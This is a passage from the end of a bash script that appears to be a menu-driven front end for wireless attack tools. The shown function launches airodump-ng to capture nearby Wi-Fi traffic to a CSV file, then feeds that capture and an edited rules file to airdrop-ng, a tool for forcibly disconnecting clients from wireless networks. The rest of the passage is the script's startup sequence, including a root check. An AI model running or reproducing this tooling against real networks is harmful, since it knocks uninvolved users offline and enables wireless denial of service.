1002 | ||
1003 | while [ 1 ] | |
1004 | do | |
1005 | read CHOICE3 | |
1006 | case "$CHOICE3" in | |
1007 | "1") | |
1008 | airoout="$DEFAULTAIRODUMPOUT" | |
1009 | break | |
1010 | ;; | |
1011 | "2") | |
1012 | echo "output name: (i.e. $DEFAULTAIRODUMPOUT)" | |
1013 | read airoout | |
1014 | echo $airoout | |
1015 | ;; | |
1016 | "3") | |
1017 | ||
1018 | rm $airoout*.csv 2> /dev/null #cleaning up csv from previous run | |
1019 | exit | |
1020 | ;; | |
1021 | esac | |
1022 | done | |
1023 | ||
1024 | echo "starting airodump-ng on $WIFIMAN" | |
1025 | $TERMINAL --geometry=1024x576 --execute bash -c "airodump-ng $WIFIMAN -w $airoout --output-format csv ; bash" 2> /dev/null & | |
1026 | ||
1027 | $TEXTEDITOR $DROPRULES | |
1028 | ||
1029 | airdrop-ng -i $WIFIMAN -t $airoout-01.csv -r $DROPRULES -b -p | |
1030 | } | |
1031 | export -f Airdropngfunc | |
1032 | ###################### Functions ###################### | |
1033 | ||
1034 | #################### Main Program ##################### | |
1035 | clear | |
1036 | rootcheck | |
1037 | argfunc | |
1038 | scriptstartfunc | |
1039 | Mainmenufunc | |
1040 | #################### Main Program ##################### |